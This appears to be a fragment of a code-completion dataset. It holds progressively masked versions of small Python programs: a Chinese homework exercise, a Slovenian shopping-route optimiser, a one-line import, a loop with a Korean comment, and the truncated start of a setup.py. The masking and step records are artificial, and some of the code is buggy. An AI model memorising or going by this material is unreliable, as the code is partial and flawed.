"step-5": "# -*- coding: utf-8 -*-\n# @Time : 2020/6/12 20:19\n# @Author : damon\n# @Site : \n# @File : work0612\n# @Software: PyCharm\n\n\nimport math\n\n\n\"\"\"\n1、给定n=10,计算1! + 2! + 3! + ... + n!的值\n\"\"\"\n# 解法1:\nn = 10\nfactorial = 1\nsum = 0\nfor i in range(1, n+1):\n factorial = i * factorial\n sum += factorial\nprint(f\"阶乘之和{sum}\")\n\n# 解法2:\nsum1 = 0\nn = 10\nfor i in range(1, n + 1):\n F = math.factorial(i)\n sum1 += F\nprint(f\"阶乘之和{sum1}\")\n\n\n\"\"\"\n2、给一个数字字符串13543897565,把每一位对应的数字转换成英文数字(例如:“123” -> \"one-two-three\")\n\"\"\"\nstr = '13543897565'\n\n\ndef f(a):\n list1 = []\n dict1 = {1: \"one\", 2: \"two\", 3: \"three\", 4: \"four\", 5: \"five\", 6: \"six\", 7: \"seven\", 8: \"eight\", 9: \"nine\", 0: \"zero\"}\n for i in list(a):\n list1.append(dict1[int(i)])\n print(\"-\".join(list1))\n\n\nf(str)\n\n\nstr1 = '13543897565'\n\n\ndef fa(x):\n dict2 = {1: \"one\", 2: \"two\", 3: \"three\", 4: \"four\", 5: \"five\",\n 6: \"six\", 7: \"seven\", 8: \"eight\", 9: \"nine\", 0: \"zero\"}\n return dict2[int(x)]\n\n\nr = map(fa, list(str1))\nprint('-'.join(r))\n\n\n\n\"\"\"\n3、我的关注列表follow_list = {\"status\":\"ok\",\"data\":{\"follow_list\":[{\"user_id\":\"32804516\",\"nickname\":\"羽秋璃1111233\",\"is_friend\":0,\"is_vip\":1},{\"user_id\":\"35742446\",\"nickname\":\"我是你的宝贝哦\",\"is_friend\":1,\"is_vip\":1},{\"user_id\":\"264844\",\"nickname\":\"大鱼噢大鱼\",\"is_friend\":0,\"is_vip\":1},{\"user_id\":\"34362681\",\"nickname\":\"薛一十三\",\"is_friend\":0,\"is_vip\":0}]}}\n(1)如果用户是vip,对用户说“土豪xxx,我关注了你,给个打赏吧”(xxx是用户昵称)\n(2)如果用户不是好友关系但是vip(is_friend=0, is_vip=1),对用户说“土豪xxx,我关注了你,给个好友位吧”\n\"\"\"\nfollow_list = {\"status\":\"ok\",\"data\":{\"follow_list\":[\n {\"user_id\":\"32804516\",\"nickname\":\"羽秋璃1111233\",\"is_friend\":0,\"is_vip\":1},\n {\"user_id\":\"35742446\",\"nickname\":\"我是你的宝贝哦\",\"is_friend\":1,\"is_vip\":1},\n {\"user_id\":\"264844\",\"nickname\":\"大鱼噢大鱼\",\"is_friend\":0,\"is_vip\":1},\n {\"user_id\":\"34362681\",\"nickname\":\"薛一十三\",\"is_friend\":0,\"is_vip\":0}]}}\n\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1:\n print(f\"土豪{x['nickname']},我关注了你,给我打赏吧\")\n\nfor x in follow_list['data']['follow_list']:\n if x['is_vip'] == 1 and x['is_friend'] == 0:\n print(f\"土豪{x['nickname']},我关注了你,给个好友位吧\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import itertools
import numpy
import math
import psycopg2
import podatki
baza = podatki.baza
dom = podatki.preberi_lokacijo()
seznam_trgovin =["spar", "mercator", "tus", "hofer", "lidl"]
id_in_opis = podatki.id_izdelka_v_opis()
seznam_izdelkov = [el[0] for el in id_in_opis] #['cokolada', 'sladoled', ...]
mnozica_izdelkov = set(seznam_izdelkov)
trgovine_z_izdelki = podatki.trgovine_z_izdelki_f() #slovar: {'trgovina':['id1', 'id2'],...}
seznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]
'''
def zemljevid_trgovin(trgovine):
sez = []
for trgovina in trgovine:
sez.append([trgovina, [])
def kombinacije_trgovin(seznam_izdelkov):
sez_kombinacij = []
for trgovina in trgovine:
kombinacija = []
izdelki = sez_izdelkov
for izdelek in izdelki:
if izdelek in trgovina:
izdelki = izdelki.remove(izdelek)
'''
def kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):
generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for el in itertools.product(*[[0,1]]*len(seznam_trgovin)))
kombinacije = []
for mnozica_trgovin in generator_kombinacij:
izdelki_kombinacije = set()
for trgovina in mnozica_trgovin:
for izdelek in trgovine_z_izdelki[trgovina]:
izdelki_kombinacije.add(izdelek) #množica vseh izdelkov, ki jih lahko dobiš v danih trgovinah
if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):
kombinacije.append(mnozica_trgovin)
for kombinacija in kombinacije:
for kombinacija2 in kombinacije:
if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija2)
elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija)
for kombinacija in kombinacije:
for kombinacija2 in kombinacije:
if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija2)
elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija)
return kombinacije
return None
def razdalja(vozlisce1, vozlisce2):
return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] - vozlisce1[0]) ** 2)
#dom = [x,y]
def doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):
skupine = [] #skupine vozlišč iste trgovine
poti = []
for trgovina in kombinacija:
skupine.append(podatki.lokacije(slovar_koordinat, trgovina))
for i in skupine[0]: #skupine[0] je seznam lokacij ene vrste trgovin
dolzina = razdalja(dom, i)
if len(kombinacija) > 1:
for j in skupine[1]:
dolzina += razdalja(i, j)
if len(kombinacija) > 2:
for k in skupine[2]:
dolzina += razdalja(j, k)
if len(kombinacija) > 3:
for m in skupine[3]:
dolzina += razdalja(k, m)
if len(kombinacija) > 4:
for n in skupine[4]:
dolzina += razdalja(m, n)
dolzina += razdalja(n, dom)
poti.append([[dom, i, j, k, m, n], dolzina])
dolzina = 0
else:
dolzina += razdalja(m, dom)
poti.append([[dom, i, j, k, m], dolzina])
dolzina = 0
else:
dolzina += razdalja(k, dom)
poti.append([[dom, i, j, k], dolzina])
dolzina = 0
else:
dolzina += razdalja(j, dom)
poti.append([[dom, i, j], dolzina])
dolzina = 0
else:
dolzina *= 2
poti.append([[dom, i], dolzina])
dolzina = 0
dolzine = [el[1] for el in poti]
if dolzine == []:
print("Nakupa ni mogoče opraviti.")
return None
mini = numpy.argmin(dolzine)
return poti[mini] #[[pot], dolzina]
return (dolzina, sez_vozlisc)
def doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):
vozlisca = []
dolzine = []
trgovine = []
for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):
par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)
dolzine.append(par[1])
vozlisca.append(par[0])
trgovine.append(kombinacija)
if dolzine == []:
return None
i = numpy.argmin(dolzine)
v = vozlisca[i]
v.append(dom)
obiskane_trgovine = trgovine[i]
return v, obiskane_trgovine
def razporeditev(obiskane_trgovine, izdelki, slovar):
izdelki2 = izdelki.copy()
razporeditev = []
for trgovina in obiskane_trgovine:
sez = []
for izdelek in izdelki:
if {izdelek}.issubset(slovar[trgovina]):
izd = podatki.id_izdelka_v_opis()[izdelek-1]
sez.append(izd)
izdelki2.remove(izdelek)
razporeditev.append([trgovina, sez])
return razporeditev
baza.commit()
slovar_koordinat = podatki.slovar_koordinat
kombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)
#print(kombinacije_trgovin)'
pot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)
razpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)
|
normal
|
{
"blob_id": "5a0702dd869862ebc27c83d10e0b1f0575de68a7",
"index": 2944,
"step-1": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\n<mask token>\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\nbaza.commit()\n<mask token>\n",
"step-4": "import itertools\nimport numpy\nimport math\nimport psycopg2\nimport podatki\nbaza = podatki.baza\ndom = podatki.preberi_lokacijo()\nseznam_trgovin = ['spar', 'mercator', 'tus', 'hofer', 'lidl']\nid_in_opis = podatki.id_izdelka_v_opis()\nseznam_izdelkov = [el[0] for el in id_in_opis]\nmnozica_izdelkov = set(seznam_izdelkov)\ntrgovine_z_izdelki = podatki.trgovine_z_izdelki_f()\nseznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]\n<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\nbaza.commit()\nslovar_koordinat = podatki.slovar_koordinat\nkombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici),\n seznam_trgovin, trgovine_z_izdelki)\npot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki)\nrazpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici,\n podatki.trgovine_z_izdelki)\n",
"step-5": "import itertools\nimport numpy\nimport math\nimport psycopg2\nimport podatki\n\nbaza = podatki.baza\ndom = podatki.preberi_lokacijo()\nseznam_trgovin =[\"spar\", \"mercator\", \"tus\", \"hofer\", \"lidl\"]\nid_in_opis = podatki.id_izdelka_v_opis()\nseznam_izdelkov = [el[0] for el in id_in_opis] #['cokolada', 'sladoled', ...]\nmnozica_izdelkov = set(seznam_izdelkov)\ntrgovine_z_izdelki = podatki.trgovine_z_izdelki_f() #slovar: {'trgovina':['id1', 'id2'],...}\nseznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]\n'''\ndef zemljevid_trgovin(trgovine):\n sez = []\n for trgovina in trgovine:\n sez.append([trgovina, [])\n\ndef kombinacije_trgovin(seznam_izdelkov):\n sez_kombinacij = []\n for trgovina in trgovine:\n kombinacija = []\n izdelki = sez_izdelkov\n for izdelek in izdelki:\n if izdelek in trgovina:\n izdelki = izdelki.remove(izdelek)\n'''\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):\n \n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for el in itertools.product(*[[0,1]]*len(seznam_trgovin)))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek) #množica vseh izdelkov, ki jih lahko dobiš v danih trgovinah\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin) \n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija) \n return kombinacije\n \n \n return None\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] - vozlisce1[0]) ** 2)\n\n#dom = [x,y] \ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = [] #skupine vozlišč iste trgovine\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]: #skupine[0] je seznam lokacij ene vrste trgovin\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print(\"Nakupa ni mogoče opraviti.\")\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini] #[[pot], dolzina]\n \n\n \n return (dolzina, sez_vozlisc)\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek-1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n \nbaza.commit()\n\nslovar_koordinat = podatki.slovar_koordinat\n\nkombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)\n#print(kombinacije_trgovin)'\npot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)\nrazpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)\n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from compas.geometry import Frame
|
flexible
|
{
"blob_id": "d4e3751b2d4796c72be497007fe4c7d8ca67e18e",
"index": 6874,
"step-1": "<mask token>\n",
"step-2": "from compas.geometry import Frame\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in a:
b *= i
print(b)
<|reserved_special_token_1|>
a = range(1, 11)
b = 1
for i in a:
b *= i
print(b)
<|reserved_special_token_1|>
a=range(1,11) #1~10숫자를 에이에 저장
b=1
for i in a: #a에있는 원소를 b에 곱하고 비에 저장
b*=i
print(b)
|
flexible
|
{
"blob_id": "8cb7290792f9390dd350e0c79711e0dd72d6063b",
"index": 9508,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in a:\n b *= i\nprint(b)\n",
"step-3": "a = range(1, 11)\nb = 1\nfor i in a:\n b *= i\nprint(b)\n",
"step-4": "a=range(1,11) #1~10숫자를 에이에 저장\nb=1\nfor i in a: #a에있는 원소를 b에 곱하고 비에 저장\n b*=i\nprint(b)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},
package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=
